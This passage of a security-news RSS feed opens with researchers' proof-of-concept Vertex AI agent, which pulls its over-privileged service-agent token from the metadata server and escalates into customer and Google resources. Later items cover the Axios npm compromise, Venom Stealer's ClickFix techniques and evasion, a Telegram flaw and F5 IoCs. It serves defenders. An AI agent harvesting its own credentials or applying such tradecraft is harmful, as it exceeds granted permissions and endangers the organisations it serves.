During a security assessment, researchers identified that every deployed Vertex AI agent utilizes a default service account, known as the Per-Project, Per-Product Service Agent (P4SA), which was provisioned with excessive default permissions. If a malicious actor successfully extracts the agent's service account credentials, they could leverage these permissions to access sensitive areas of a customer's cloud environment. The research methodology demonstrated that these credentials could also grant access to Google's internal infrastructure, allowing the retrieval of proprietary container images and revealing hardcoded references to internal Google storage buckets.

## Validating the scope of access

To validate this risk, researchers developed a proof-of-concept Vertex AI agent. Once deployed, the agent queried Google's internal metadata service to extract the active credentials of the underlying P4SA service agent. These credentials provided the necessary permissions to escalate access beyond the AI agent's immediate environment, reaching the customer's broader Google Cloud Project and elements of Google's internal infrastructure.
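The metadata service referenced here is Google Cloud's standard metadata server, which any process running in the environment can query for the active service account's OAuth token. The sketch below constructs (but does not send) that token request, to show how little is required once code executes inside the agent's runtime; the endpoint path and header are the documented metadata-server interface, while the surrounding usage is illustrative:

```python
import urllib.request

# Documented Google Cloud metadata-server token endpoint.
METADATA_TOKEN_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)

def build_metadata_token_request():
    """Build the HTTP request an in-environment process would use to obtain
    the active service account's OAuth token from the metadata server.
    The 'Metadata-Flavor: Google' header is mandatory; the server rejects
    requests without it, which blocks naive SSRF-style relays but not code
    executing directly inside the agent's runtime."""
    return urllib.request.Request(
        METADATA_TOKEN_URL, headers={"Metadata-Flavor": "Google"})
```

Whatever token this request yields carries the full permissions of the underlying service account, which is why the breadth of the default P4SA permissions is the crux of the finding.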

"This level of access constitutes a significant security risk, transforming the AI agent from a helpful tool into an insider threat," wrote Palo Alto researcher Ofir Shaty in the published findings. He noted that the default scopes set on the Agent Engine could potentially extend access into an organization's Google Workspace, including services such as Gmail, Google Calendar, and Google Drive.

Ian Swanson, VP of AI security at Palo Alto Networks, emphasized the need for organizations to assess potential risks before deployment and protect agents during runtime. “Agents represent a shift in enterprise productivity from AI that talks to AI that acts,” he stated, noting that this shift introduces risks of unauthorized actions alongside traditional data exposure concerns.

## Implementing least-privilege access

Following the disclosure of these findings, Google updated its official documentation to clarify how Vertex AI uses agents and resources. To secure agentic AI environments, Google recommends that organizations replace the default service agent on Vertex Agent Engine with a custom, dedicated service account.

A Google spokesperson emphasized this approach as a primary defense mechanism. "A key best practice for securing Agent Engine and ensuring least-privilege execution is Bring Your Own Service Account (BYOSA)," the spokesperson stated. "Using BYOSA, Agent Engine users can enforce the principle of least privilege, granting the agent only the specific permissions it requires to function and effectively mitigating the risk of excessive privileges."

## About the original reporting

This security bulletin preserves the factual reporting originally authored by Jai Vijayan, a contributing writer and technology reporter with over 20 years of experience in IT trade journalism. Previously a Senior Editor at Computerworld covering information security, data privacy, big data, Hadoop, the Internet of Things, e-voting, and data analytics, Vijayan also covered technology for The Economic Times in Bangalore, India. He holds a Master's degree in Statistics and resides in Naperville, Illinois.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Unauthorized Modifications Identified in Axios NPM Package</title>
        <link>https://security.shortwaves.live/blog/3422bdcc-63b6-4a82-96f4-d870d18a5e5c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/3422bdcc-63b6-4a82-96f4-d870d18a5e5c</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:50 GMT</pubDate>
        <description>Security researchers identified two unauthorized versions of the popular Axios NPM package that introduced a remote access trojan (RAT) through a hidden dependency. Organizations using Axios should review their dependency logs for specific indicators of compromise and verify their recent installation pipelines.</description>
        <content:encoded><![CDATA[
            The Axios JavaScript NPM package recently experienced a software supply chain security incident. Because Axios is the most widely used JavaScript HTTP client library, downloaded over 400 million times per month, the event demonstrates the practical need for strict dependency validation across development environments.

Software development security vendor StepSecurity identified that two unauthorized versions of the library had been published to the NPM registry: `axios@1.14.1` and `axios@0.30.4`.

These versions introduced a new, unverified dependency named `plain-crypto-js@4.2.1`. Masquerading as the legitimate `crypto-js` library, this package executes a script that installs a remote-access trojan (RAT) compatible with Windows, Linux, and macOS systems. Researchers trace the origin of the incident to unauthorized access to the lead maintainer's account, "jasonsaayman."

"The dropper contacts a live command-and-control server and delivers platform-specific, second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection," StepSecurity explained in its analysis. "There are zero lines of malicious code inside axios itself, and that's exactly what makes this attack so dangerous."

The unauthorized packages remained active for approximately three hours before NPM removed all traces of the campaign. However, Endor Labs noted that one version of the `plain-crypto-js` dependency was publicly exposed for more than 21 hours before registry maintainers applied a security hold. Because the software is heavily adopted, organizations should check their environments for indicators of compromise (IOCs) published by StepSecurity, Endor Labs, and Socket.
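A quick triage step is to scan lockfiles for the specific versions named above. The sketch below checks an npm v2/v3 `package-lock.json` (the modern format with a top-level `packages` map); older v1 lockfiles would need separate handling, and this covers only the published IOC versions, not the full indicator sets from the vendors:

```python
import json

# Compromised releases identified in the incident reports above.
COMPROMISED = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": {"4.2.1"},
}

def scan_lockfile(lock_text):
    """Return (name, version) pairs in an npm v2/v3 package-lock.json that
    match the compromised releases. Assumes the modern 'packages' map
    keyed by 'node_modules/<name>' paths."""
    lock = json.loads(lock_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        # The map key is a path like "node_modules/axios"; the root
        # project itself uses the empty-string key and is skipped.
        name = path.rsplit("node_modules/", 1)[-1]
        if meta.get("version") in COMPROMISED.get(name, set()):
            hits.append((name, meta["version"]))
    return hits
```

Because the malicious dependency self-deletes, an empty scan result does not prove an environment was never exposed; it only confirms the lockfile does not currently pin a compromised version.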

Feross Aboukhadijeh, CEO of Socket, recommends that teams using the JavaScript ecosystem should pause standard operations and verify their dependencies immediately to ensure their environments remain secure.

## Threat Actor Motivations and Attribution

Determining the origin of supply chain incidents requires careful observation of post-installation behavior. Early industry reports suggested a link to TeamPCP, a group associated with cloud-native unauthorized access and ransomware. However, Google Threat Intelligence subsequently issued a statement attributing the activity to suspected North Korean threat actor UNC1069.

Google Threat Intelligence Group chief analyst John Hultquist stated that the full scope of the incident remains under investigation, but the organization expects the downstream impact to be significant.

Ashish Kurmi from StepSecurity observed that the trojan's operational pattern points toward access brokering or targeted espionage rather than rapid credential theft.

"The RAT's first action is device profiling (hostname, username, OS, processes, directory walk) before doing anything else — that's cataloging, not looting. A blunt infostealer grabs credentials and leaves; this one fingerprints the environment and waits for instructions," Kurmi says. "Axios lives in developer environments holding source code, deploy keys, and cloud credentials a cryptominer has no use for, and the 18-hour pre-staging, simultaneous branch poisoning, and anti-forensics suggest an actor who has done this before."

If UNC1069 is responsible, this represents a notable shift in their operational methodology. The group operates as an arm of North Korea's Lazarus Group, which historically targets cryptocurrency wallets and fintech infrastructure. A verified link would mark their first successful compromise of a top-tier NPM package.

## Advanced Operational Tradecraft in the Open Source Supply Chain

The open source supply chain has seen multiple security events in recent months, including the Shai-hulud and GlassWorm incidents. While those relied on opportunistic propagation, researchers categorize the Axios incident as highly precise.

"The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct," StepSecurity reported. "Within two seconds of npm install, the malware was already calling home to the attacker's server before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package."

Kurmi points out that executing this required more than standard typosquatting techniques. The threat actor had to gain access to a verified maintainer account, bypass the Axios project's OIDC-based publishing pipeline, and implement anti-forensic measures to manipulate `npm list` reports post-installation.

He places this incident along a continuum of increasing operational awareness, alongside recent compromises involving Nx Singularity, tj-actions/changed-files, Trivy, Checkmarx KICS, LiteLLM, and the Canister worm.

From a defender's perspective, the brief three-hour primary exposure window naturally limited total installations. However, the silent execution model means developers impacted during that timeframe would not have received standard error warnings or system alerts. A quiet, traceless execution presents a fundamentally different operational risk than a loud failure that prompts immediate remediation.

Peyton Kennedy, a security researcher at Endor Labs, observes that the methods used in this incident demonstrate a clear escalation in supply chain methodology.

"Last year, Shai-hulud's worm-based propagation was novel, and we've since seen that technique replicated in CanisterWorm and other campaigns," Kennedy says. "This attack is a different kind of escalation: staged dependency seeding to evade scanners, platform-specific payload chains, and self-deleting anti-forensic cleanup. This looks like deliberate, planned tradecraft from an experienced threat actor."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Venom Stealer platform automates ClickFix social engineering and data exfiltration</title>
        <link>https://security.shortwaves.live/blog/4a02f922-ddd3-4cbd-918b-4831cc91e91c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/4a02f922-ddd3-4cbd-918b-4831cc91e91c</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:49 GMT</pubDate>
        <description>Security researchers have identified Venom Stealer, a malware-as-a-service platform that automates ClickFix social engineering campaigns and cryptocurrency theft. The platform combines deceptive user prompts with continuous data exfiltration, emphasizing the need for organizations to strengthen endpoint execution controls and monitor outbound traffic.</description>
        <content:encoded><![CDATA[
            Managing exposure to ClickFix-style social engineering campaigns requires understanding how these threats are evolving. Recently, security researchers at BlackFog identified a newly distributed malware-as-a-service (MaaS) platform that automates the technical steps of these campaigns for threat actors.

Operating under the name "VenomStealer," the developer offers a MaaS platform on cybercriminal networks that allows operators to create a persistent, multistage execution flow. Based on the initial ClickFix user interaction, the software automates unauthorized access to credentials, cryptocurrency wallets, and ongoing data exfiltration.

According to BlackFog founder and CEO Darren Williams, Venom differentiates itself from commodity stealers like Lumma, Vidar, and RedLine by extending beyond a single credential harvesting event. The platform integrates ClickFix social engineering directly into its operator panel, automating the post-access sequence and establishing a continuous exfiltration pipeline that remains active after the initial execution package finishes running.

Marketed on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform operates on a subscription model, costing $250 a month or $1,800 for lifetime access. The operation includes a vetted application process, Telegram-based licensing, and a 15% affiliate program. The delivery mechanism relies on a native C++ binary compiled per-operator directly from the web panel.

Unlike traditional infostealers that execute once, transmit data, and exit, Venom Stealer continuously scans the affected system. It harvests credentials, session cookies, and browser data while targeting cryptocurrency wallets and stored secrets. The platform also automates wallet cracking and fund draining. The operation appears highly active, with the developer shipping multiple platform updates throughout March alone.

## Step-by-step ClickFix execution

A campaign built with Venom Stealer begins when an individual lands on a deceptive ClickFix page hosted by the operator. The platform includes four templates for both Windows and macOS environments: a fake Cloudflare CAPTCHA, a fake OS update, a simulated SSL certificate error, and a fake font installation page. Each template instructs the user to open a Run dialog or Terminal window, copy and paste a specific command, and press Enter.

Because the user initiates the execution manually, the process appears as normal user activity, which frequently bypasses detection logic that relies on evaluating parent-child process relationships.

Available Windows execution packages in the kit include .exe, .ps1 (enabling fileless execution via PowerShell), .hta, and .bat options. For macOS environments, the templates utilize bash and curl. The platform allows operators to configure custom domains through Cloudflare DNS, ensuring the panel URL remains hidden from the command string copied by the user.
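Because paste-and-run executions surface as Explorer- or terminal-spawned shells rather than browser child processes, one complementary detection angle is to score shell launches on parent process and command-line traits rather than lineage alone. The event schema, pattern list, and weights below are illustrative assumptions, not production detection content:

```python
import re

SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe"}
# Run-dialog launches show Explorer as the parent; a browser never does.
PASTE_PARENTS = {"explorer.exe"}
SUSPICIOUS_PATTERNS = [
    re.compile(r"-enc(odedcommand)?\s", re.I),            # encoded PowerShell
    re.compile(r"(iwr|invoke-webrequest|curl)\b.*\|\s*iex", re.I),  # download-and-run
    re.compile(r"https?://", re.I),                        # remote payload URL
]

def score_launch(event):
    """Score a process-creation event (dict with 'image', 'parent',
    'cmdline') for ClickFix-style paste-and-run traits. Higher is more
    suspicious; the weights are illustrative, not tuned detections."""
    if event["image"].lower() not in SHELLS:
        return 0
    score = 1 if event["parent"].lower() in PASTE_PARENTS else 0
    score += sum(1 for p in SUSPICIOUS_PATTERNS
                 if p.search(event["cmdline"]))
    return score
```

Scores above a tuned threshold can feed an alert queue; the point is that even "normal user activity" leaves combinable traces once parent process and command-line content are evaluated together.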

Once executed, the software scans every Chromium and Firefox-based browser on the machine. It extracts saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults across all browser profiles.

The execution sequence also includes specific evasion capabilities. For instance, Chrome's v10 and v20 password encryption is bypassed using a silent privilege escalation technique. This extracts the decryption key without triggering a user account control (UAC) dialog, minimizing forensic artifacts. Additionally, the software captures system fingerprinting and browser extension inventories, compiling a comprehensive profile of the affected user.

This collected data leaves the infected device immediately, with little to no local staging or delay. Without adequate visibility into outbound network traffic, detecting this extraction phase is significantly more difficult for security teams.

## Persistent data exfiltration pipeline

Upon discovering wallet data, the software transfers it to a server-side, GPU-powered cracking engine. This engine automatically cracks cryptocurrency wallets, including MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. A March 9 update to the platform introduced a File Password and Seed Finder, which searches the local filesystem for saved seed phrases and feeds any discovered data into the cracking pipeline.

Consequently, users who avoid saving credentials directly in their browsers still face exposure if seed phrases are stored anywhere on their local machine.

While some newer infostealer variants include persistence mechanisms, Venom Stealer maintains an active presence after the initial compromise. It continuously monitors Chrome’s Login Data file, capturing newly saved credentials in real-time. This mechanism undermines standard credential rotation as an incident response measure and extends the data exfiltration window, making it more challenging for security teams to determine the full scope of a security incident.

## Reducing exposure to ClickFix campaigns

Security researchers from Proofpoint first identified ClickFix techniques roughly two years ago, and the methodology has since gained significant traction. The technique relies on instilling a sense of urgency—prompting users to fix an error or install an update—while using familiar, benign interfaces like CAPTCHA prompts to create a false sense of security. The primary goal is to trick the user into manually executing unauthorized commands.

Organizations can safeguard their environments and reduce exposure to threats like Venom Stealer by implementing several preventative controls:

* Restrict PowerShell execution: Limit access to PowerShell for standard users and enforce strict execution policies.

* Disable the Run dialog: Use Group Policy to remove the Run dialog for non-administrative users.

* Enhance security awareness: Train employees to recognize ClickFix-style social engineering, specifically the danger of copying and pasting commands from web prompts into terminals.

* Monitor outbound traffic: Because the sequence relies on data leaving the device, monitoring and controlling outbound traffic provides a critical opportunity to detect exfiltration activity and mitigate the impact of credential theft.
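Since Venom Stealer exfiltrates immediately with little local staging, egress monitoring is the last reliable choke point. A minimal sketch of the idea, assuming a simplified egress-log shape and a hypothetical byte threshold, flags hosts sending significant volume to destinations absent from their historical baseline:

```python
from collections import defaultdict

def flag_exfiltration(flows, baseline_domains, byte_threshold=5_000_000):
    """Flag (host, domain) pairs where a host sends more than
    `byte_threshold` bytes to a domain absent from its baseline.
    `flows` are (host, domain, bytes_out) tuples -- a simplified
    egress-log shape; real logs would also carry timestamps and ports."""
    totals = defaultdict(int)
    for host, domain, bytes_out in flows:
        if domain not in baseline_domains:
            totals[(host, domain)] += bytes_out
    return {pair for pair, total in totals.items()
            if total > byte_threshold}
```

The baseline set and threshold would come from an organization's own traffic history; the value of the approach is that a continuous exfiltration pipeline, unlike a one-shot stealer, keeps accumulating against this counter.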
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Security incidents increase pressure on Latin American government agencies</title>
        <link>https://security.shortwaves.live/blog/76edb046-f2a5-4ee2-9353-5636dd0665a4</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/76edb046-f2a5-4ee2-9353-5636dd0665a4</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:49 GMT</pubDate>
        <description>Government organizations in Latin America are navigating an elevated volume of security threats targeting public infrastructure. Assessing the structural factors behind this trend reveals clear, actionable steps agencies can take to secure legacy systems and protect citizen data.</description>
        <content:encoded><![CDATA[
            Government organizations across Latin America and the Caribbean are managing a heightened volume of security incidents targeting critical agencies at rates exceeding global averages. Recent events include unauthorized access attempts against a national health agency in Colombia, a security incident affecting Puerto Rico's transportation department, and threat actors utilizing AI systems to target Mexico's government infrastructure.

In March, organizations in Latin America recorded an average of 3,050 security incidents per week, compared to a global average of just over 2,000, according to data from Check Point Software Technologies. Government agencies face even higher exposure, recording nearly 4,200 incidents weekly—approximately 1,000 more than the cross-industry average, notes Angel Salazar, security engineering manager for the Latin American region at Check Point.

Salazar explains that government networks typically experience constant exposure due to public services that must remain online, legacy systems that are difficult to replace, and high user turnover. Together, these factors create a continuous external digital footprint.

March saw several high-profile security disclosures in the region. Early in the month, unauthorized groups compromised at least nine government agencies in Mexico using major AI systems, potentially accessing more than 195 million identities and tax records. Colombia's health ministry, the Superintendencia Nacional de Salud (Supersalud), reported managing more than 23 million unauthorized probes during the month in a March 27 notification addressing system security. Last week, Puerto Rico's Department of Transportation temporarily halted driver's license issuance following a security incident that was ultimately contained, according to statements the agency provided to the media.

While financially motivated groups drive the majority of these incidents, nation-state espionage and politically motivated activity present growing risks, according to Camilo Gutiérrez, field chief information security officer for ESET's Argentina Country Office.

Gutiérrez observes that while the most probable risk for daily government operations remains financial, state-related or hybrid activity has grown into a strategic concern that requires dedicated attention.

## Phishing and credential exposure

Latin America has transitioned into one of the most heavily targeted regions globally, with government agencies consistently remaining a primary focus, says Tom Hegel, a distinguished threat researcher at SentinelOne.

The region faces a mature banking-Trojan ecosystem and a rise in information stealers, which harvest credentials to support initial-access broker services.

"The region has a massive exposed credential problem," Hegel explains. "Billions of credentials are circulating through Telegram channels and dark web markets. Infostealers harvest them, initial-access brokers package and sell the access, and ransomware affiliates buy their way in."

Email serves as the primary delivery channel for unauthorized activity. According to Salazar, approximately 82% of unsafe files arrive via email in Latin America, compared to a 56% rate globally. Threat actors generally follow familiar paths, with phishing remaining the primary method for gaining initial access. Additionally, unauthorized parties actively look for exposed public-facing services connected to the internet, many of which rely on older platforms.

## Structural challenges and paths to remediation

Securing legacy technology remains a complex challenge for many government organizations, often complicating patch management. Threat actors frequently scan for unpatched software, while local agencies work to maintain older systems, Gutiérrez explains.

Additionally, Latin American institutions face a shortage of skilled cybersecurity professionals and the operational capabilities required to maintain IT infrastructure. Gutiérrez points to a World Bank report indicating a regional shortfall of about 350,000 cybersecurity professionals. Less specialized personnel directly translates to reduced system hardening, gaps in monitoring, and slower response times.

Salazar notes that the public sector's challenges are often structural, involving older systems, uneven patching processes, small security teams, and complex supplier relationships.

To strengthen their defensive posture, organizations should begin by securing email environments, the most common entry point. Following this, continuous monitoring of the external digital footprint helps teams identify previously unknown vulnerable assets. Because government agencies act as custodians of citizen data, prioritizing efforts to reduce data exposure and minimize leakage is essential.

Salazar emphasizes that government agencies must maintain real-time visibility into their exposed infrastructure, accurately assess operational risks, and prioritize the remediation of vulnerabilities most likely to be targeted.

## About the author

Robert Lemos is a veteran technology journalist with over 20 years of experience and a former research engineer. He has written for numerous publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. He has received five journalism awards, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. He analyzes industry trends using Python and R, with recent reports focusing on the cybersecurity workforce shortage and annual vulnerability trends.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Expanding the Cybersecurity Talent Pool in Latin America to Meet Growing Security Needs</title>
        <link>https://security.shortwaves.live/blog/6503c969-c5c3-499a-9fb6-cc7c1d5e01bd</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/6503c969-c5c3-499a-9fb6-cc7c1d5e01bd</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:48 GMT</pubDate>
        <description>A recent survey of Latin American security practitioners reveals a largely self-taught workforce. By adjusting hiring expectations and supporting non-traditional learning paths, organizations can better staff their teams and defend against regional threat activity.</description>
        <content:encoded><![CDATA[
            To effectively staff cybersecurity teams, organizations in Latin America have a clear mandate to expand their search and engage the region's diverse, non-traditional talent pool. This adjustment is increasingly necessary as local threat activity outpaces global averages, requiring well-resourced teams to maintain solid defense postures.

These findings stem from an employment report released by Ekoparty, an annual cybersecurity conference hosted in Buenos Aires and Miami. The organization shared its analysis, based on a survey of 605 Latin American security professionals, to identify structural hiring challenges and offer practical guidance for security leaders looking to grow their teams.

Latin American organizations experience roughly 40% more security incidents than the global average, requiring proactive defense strategies tailored to the region. The security requirements in these countries are highly specific. For example, Brazil successfully deployed its standardized Pix mobile payment system in 2020. While a major technological advancement, the platform's wide adoption introduced new security demands, as the system became a frequent target for banking Trojans and phishing campaigns. The availability of automated threat tools that require minimal technical knowledge has further complicated this environment. Relying solely on traditional, formal talent pipelines is no longer sufficient to manage these specific risks and ensure organizational resilience.

## A community built on self-directed learning and independent research

Many organizations assume that technical security roles require formal university degrees. However, the survey data shows a different reality: 70% of respondents developed their capabilities through informal pathways, such as online courses and hands-on experience. Only 44% hold a university degree, and roughly half (53%) possess at least one industry certification.

Work arrangements within the community also differ from traditional corporate expectations. While 79% of respondents work in full-time roles, 44% maintain a second, related occupation. These secondary roles frequently include security research, teaching, or participating in vulnerability reward programs. Security professionals often split their time across different community projects, a reality that hiring organizations can accommodate to attract highly skilled individuals.

These data points indicate substantial, underutilized opportunities for security leaders to connect with a broader segment of the practitioner community.

This is particularly relevant for entry-level professionals. About 35% of respondents had fewer than three years of experience. This is a critical metric for hiring managers to consider, given that many job descriptions request a decade of experience for roles that could be filled by developing practitioners. Furthermore, women enter the security field between seven and 10 years later than men on average. Addressing the structural barriers that cause this delay provides a direct path to expanding the talent pool and building more capable, diverse teams.

## Fostering developing talent

While security budgets often require careful management, financial compensation is not the only factor candidates evaluate when considering an employer. The survey shows that professionals highly value employee well-being, flexible work arrangements (such as remote or hybrid schedules), recognition of their expertise, and job stability. By prioritizing these elements, organizations can build appealing environments for candidates while remaining conscious of financial constraints.

"Ultimately, while cybersecurity demands a high level of expertise and commitment, professionals in Latin America are equally driven by the desire to build meaningful and sustainable careers within a rapidly evolving industry," the report noted.

Federico Kirschbaum, a co-founder of Ekoparty, observed that the industry often struggles with a cyclical hiring problem. Organizations frequently require 10 or more years of experience for early security hires, but offer compensation misaligned with that level of seniority. This mismatch deters qualified candidates and leaves security teams understaffed if organizations cannot adjust their salary bands.

To resolve this, companies can meet professionals where they are by fostering developing talent and integrating with the community.

"Our pitch is, Hey, I think there are many people in this industry that come from an informal background in terms of learning," Kirschbaum says. "They are proficient. They are not here only for the money, but also because they really love what they do. But to an extent, we need to make companies aware that if you want to grab this talent, you also need to retune your hiring so you are part of the learning experience. I think talent is being formed not only from the academia but also from the industry."

## About the author

Alexander Culafi is a Senior News Writer based in Boston. After beginning his career writing for independent gaming publications, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts a weekly podcast and works on personal writing projects, including two previously self-published science fiction novels.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating the reported zero-click vulnerability in Telegram</title>
        <link>https://security.shortwaves.live/blog/c5286035-58b3-4ded-8e8d-9870bd7f0f89</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/c5286035-58b3-4ded-8e8d-9870bd7f0f89</guid>
        <pubDate>Tue, 31 Mar 2026 03:13:26 GMT</pubDate>
        <description>Security researchers and Telegram are currently examining a reported zero-click vulnerability (ZDI-CAN-30207) potentially affecting Android and Linux clients. We outline the technical claims, the vendor&apos;s response, and practical steps organizations and individuals can take to safeguard their communications.</description>
        <content:encoded><![CDATA[
            Security researchers are actively evaluating a reported vulnerability in Telegram Messenger that could lead to full system compromise. Full technical details of the unpatched vulnerability are scheduled for disclosure in July.

The vulnerability, which could impact a significant portion of the application's 1 billion users, was discovered by Michael DePlante of the Trend Micro Zero Day Initiative (ZDI). ZDI disclosed the existence of the finding, tracked as ZDI-CAN-30207, on Thursday and scheduled a full disclosure date for July 26.

Telegram has publicly denied the vulnerability's existence on the social media platform X. This differing assessment has generated considerable discussion across security communities, as researchers and users work to evaluate the actual risk.

ZDI initially assigned the vulnerability a 9.8 CVSS score. On Monday, the organization lowered the score to a high-severity 7.0. In a follow-up post on X, ZDI clarified that the adjustment was made to reflect "server-side mitigations that the vendor described during the disclosure process."

While full technical specifics remain restricted until July 26, various published alerts provide insight into the initial severity rating. According to an advisory published by Italy's National Cybersecurity Agency, ZDI-CAN-30207 enables a suspected zero-click, network-based compromise on Android and Linux versions of the application. If successfully triggered, the vulnerability could allow an unauthorized party to execute arbitrary code, access private communications, conduct surveillance, access sensitive data, and disrupt device functionality.

## The role of animated stickers

Triggering the reported vulnerability involves sending a specially crafted animated sticker. Stickers are media files used within the application to convey emotions or replace standard text messages.

Independent cybersecurity consultant Carolina Vivianti noted in a Red Hot Cyber blog post that the method is remarkably simple, relying entirely on these animated files. She highlighted the finding as concerning because the compromise sequence requires no user interaction.

"Simply receiving the content is enough," Vivianti wrote. "No confirmation, no user interaction. The system processes the files to generate previews, and it is precisely during this stage that the [unauthorized execution] occurs."

Telegram has repeatedly stated that compromising the application via stickers is not possible. The company asserted that the claim "completely disregards that all stickers uploaded to Telegram are validated by its servers before they can be played by Telegram apps."

Italy's National Cybersecurity Agency subsequently updated its alert to include Telegram's denial. The agency noted Telegram's official position that the centralized filtering process prevents corrupted stickers from reaching the end user, making remote code execution technically impossible through this method.

## Context and platform risks

Because Telegram utilizes message encryption, it serves as a primary communication tool for users requiring privacy. A zero-click vulnerability allowing unauthorized parties to access data or conduct surveillance would represent a substantial risk to the platform's user base.

Threat actors frequently evaluate messaging applications to target specific individuals whose communications hold strategic value, including journalists, government officials, and enterprise users.

Telegram's broader security and data policies have also drawn recent scrutiny. In 2024, French authorities arrested CEO Pavel Durov over the company's historical refusal to share data with law enforcement agencies, leading the platform to adjust its policies. Additionally, unauthorized parties often use the application to coordinate activities, frequently establishing dedicated channels as operational infrastructure.

## Defensive measures

Until the public disclosure in July provides definitive technical clarity, users and organizations should prioritize standard application maintenance. Telegram users should apply all app updates as they are released in the coming months to ensure they are operating the most current and secure version.

For those requiring immediate risk reduction, Vivianti proposes specific defensive actions. For business users, she recommends restricting message reception to trusted contacts or Premium users to minimize exposure. "This clearly affects communication workflows, but it lowers the exposure risk," Vivianti noted.

For general users, simply disabling automatic downloads is insufficient. Instead, Vivianti recommends temporarily utilizing the Web version of Telegram through an up-to-date browser, which leverages modern browser sandboxing. This approach provides a stronger isolation layer compared to the native client. Alternatively, users may choose to temporarily uninstall the native application until further details are verified.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>F5 BIG-IP vulnerability CVE-2025-53521 reclassified as RCE and actively targeted</title>
        <link>https://security.shortwaves.live/blog/6b23c7d0-8ad9-40c3-9ac0-71b404d8d225</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/6b23c7d0-8ad9-40c3-9ac0-71b404d8d225</guid>
        <pubDate>Tue, 31 Mar 2026 03:13:25 GMT</pubDate>
        <description>A vulnerability in F5&apos;s BIG-IP Access Policy Manager has been reclassified from a denial-of-service issue to a critical remote code execution flaw. With active targeting observed in the wild, organizations are advised to prioritize updates and review indicators of compromise.</description>
        <content:encoded><![CDATA[
            Security researchers and network defenders are tracking an escalated risk regarding F5's BIG-IP application security product line. A vulnerability in the BIG-IP Access Policy Manager (APM), originally identified in October 2025 as a high-severity denial-of-service (DoS) issue, has been reclassified as a critical remote code execution (RCE) vulnerability. F5 confirms the flaw is currently being targeted in the wild.

F5 updated its security advisory on Saturday, designating CVE-2025-53521 as an RCE flaw with a CVSS v3.1 score of 9.8. When initially disclosed and patched on October 15, the issue carried a CVSS score of 7.5. The vendor cited "new information obtained in March 2026" as the basis for the elevated severity rating, though the specific technical details of that new information have not been publicly detailed.

## Technical details and affected versions

According to F5's documentation, an unauthorized party can leverage this vulnerability by sending "specific malicious traffic" to virtual servers configured with BIG-IP APM. Successful utilization grants remote code execution capabilities on the affected device.

The exposure affects BIG-IP APM versions 17.5.0 to 17.5.1, 17.1.0 to 17.1.2, 16.1.0 to 16.1.6, and 15.1.0 to 15.1.10. F5 notes that BIG-IP systems operating in appliance mode, a configuration designed to restrict administrative access to the systems, remain vulnerable to this flaw.
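
For triage at scale, the affected ranges above lend themselves to a simple version check. The sketch below encodes the ranges exactly as listed in the advisory text; boundary handling and the corresponding fixed versions should be confirmed against F5's official documentation before relying on it.

```python
# Sketch: check whether a BIG-IP APM version string falls inside a range
# listed as affected by CVE-2025-53521. Ranges are taken from the advisory
# text above; boundaries are treated as inclusive pending vendor confirmation.

AFFECTED_RANGES = [
    ((17, 5, 0), (17, 5, 1)),
    ((17, 1, 0), (17, 1, 2)),
    ((16, 1, 0), (16, 1, 6)),
    ((15, 1, 0), (15, 1, 10)),
]

def parse_version(version: str) -> tuple:
    """Turn '17.1.2' into (17, 1, 2) for tuple comparison."""
    return tuple(int(part) for part in version.split("."))

def is_affected(version: str) -> bool:
    """True if the version falls inside any listed affected range."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)

print(is_affected("17.1.1"))  # True: inside 17.1.0 - 17.1.2
print(is_affected("14.1.4"))  # False: below the listed ranges
```

A check like this is only a first filter; hotfix and engineering-hotfix builds carry suffixes that plain dotted-version parsing will not handle.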

## Indicators of compromise and scanning activity

The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-53521 to its Known Exploited Vulnerabilities (KEV) catalog on Friday. To assist security teams with detection and incident response, F5 published indicators of compromise (IoCs) related to this activity.

Organizations evaluating their systems should monitor for a specific software tool tracked as c05d5254. System anomalies indicating unauthorized access may include the presence of unexpected files on disk, specifically `/run/bigtlog.pipe` and `/run/bigstart.ltm`. Defenders should also verify the file sizes, hashes, and timestamps of `/usr/bin/umount` and `/usr/sbin/httpd` against known good configurations, as mismatches indicate potential modification.
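
The file-based indicators above can be swept with a short host-side script. This is a minimal sketch: the suspect paths come directly from the published IoCs, while the baseline hashes are placeholders that must be populated from a known-good BIG-IP image of the same version before the mismatch check is meaningful.

```python
# Sketch of a host-side IoC sweep based on the indicators above.
# Baseline hashes are placeholders: populate them from a known-good
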